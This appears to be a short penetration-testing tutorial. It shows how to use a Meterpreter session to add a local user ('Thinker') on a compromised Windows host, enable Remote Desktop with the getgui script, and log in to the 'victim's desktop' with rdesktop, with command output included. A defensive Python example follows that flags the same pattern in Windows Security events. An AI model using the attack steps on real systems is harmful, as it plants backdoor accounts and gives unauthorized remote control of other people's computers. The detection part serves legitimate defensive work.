Meterpreter: Remote Desktop
Hello everyone,

As I said before, when we have a session open in Meterpreter or we have access to cmd, we can add rules for the firewall to accept our connection or to disable the method getgui -u -p.

-u stands for username and -p stands for password.

When we're in someone's computer cmd (command prompt), we can add a user by using:

net user Thinker /add

All we need now is to place the newly created username in:

getgui -u Thinker -p ''

This will create an open RDP connection for this user. We can easily use RDESKTOP for the remote desktop connection.

meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
Or: getgui -e
OPTIONS:
    -e Enable RDP only.
    -f Forward RDP Connection.
    -h Help menu.
    -l The language switch
       Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
    -p The Password of the user

meterpreter > run getgui -u Thinker -p ''
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez firstname.lastname@example.org
[*] Language detection started
[*] Language detected: en_US
[*] Setting user account for logon
[*] Adding User: Thinker with Password: ''
[*] Adding User: Thinker to local group ''
[*] Adding User: Thinker to local group ''
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150122.2458.rc

Now open a terminal, use exploit pentest/exploit/framework, and just type:

rdesktop -u Thinker -p '' <IP> xx.xx.xx.xx

Voila! You'll see a window opened with the victim's desktop.
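
On the defender's side, the sequence in the getgui output above (account created, account added to local groups, then an RDP logon) leaves a matching trail in the Windows Security log. The following is an added detection example, not part of the original post or of the getgui script; it correlates Security event IDs 4720, 4732 and 4624 (logon type 10) over constructed, already-parsed events. The field names, the 15-minute window and the watched group names are assumptions (the output above elides the group names).

```python
from datetime import datetime, timedelta

# Windows Security event IDs: 4720 = local account created,
# 4732 = member added to a local group, 4624 = successful logon.
WATCHED_GROUPS = {"Remote Desktop Users", "Administrators"}  # assumed groups
WINDOW = timedelta(minutes=15)  # assumed correlation window

# Constructed sample events (already parsed; field names are hypothetical).
EVENTS = [
    {"time": "2015-01-22T10:00:05", "host": "WS01", "id": 4720, "user": "Thinker"},
    {"time": "2015-01-22T10:00:06", "host": "WS01", "id": 4732, "user": "Thinker",
     "group": "Remote Desktop Users"},
    {"time": "2015-01-22T10:00:06", "host": "WS01", "id": 4732, "user": "Thinker",
     "group": "Administrators"},
    {"time": "2015-01-22T10:03:40", "host": "WS01", "id": 4624, "user": "Thinker",
     "logon_type": 10, "src": "192.0.2.10"},
    {"time": "2015-01-22T11:00:00", "host": "WS02", "id": 4720, "user": "svc_backup"},
    {"time": "2015-01-22T12:30:00", "host": "WS02", "id": 4624, "user": "alice",
     "logon_type": 10, "src": "192.0.2.20"},
]

def detect_new_account_rdp(events):
    """Flag accounts that are created, added to a watched local group and then
    used for a RemoteInteractive (type 10) logon on the same host within WINDOW."""
    created = {}   # (host, user) -> creation time
    groups = {}    # (host, user) -> watched groups joined after creation
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["user"].lower())
        if ev["id"] == 4720:
            created[key] = ts
            groups[key] = set()
        elif key not in created or ts - created[key] > WINDOW:
            continue  # not a recently created account on this host
        elif ev["id"] == 4732 and ev.get("group") in WATCHED_GROUPS:
            groups[key].add(ev["group"])
        elif ev["id"] == 4624 and ev.get("logon_type") == 10 and groups[key]:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "groups": sorted(groups[key]), "src": ev.get("src"),
                           "seconds_after_creation":
                               int((ts - created[key]).total_seconds())})
    return alerts

if __name__ == "__main__":
    for alert in detect_new_account_rdp(EVENTS):
        print("ALERT:", alert)
```

A change of the fDenyTSConnections registry value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server on a host where RDP was previously disabled is a further signal worth feeding into the same correlation.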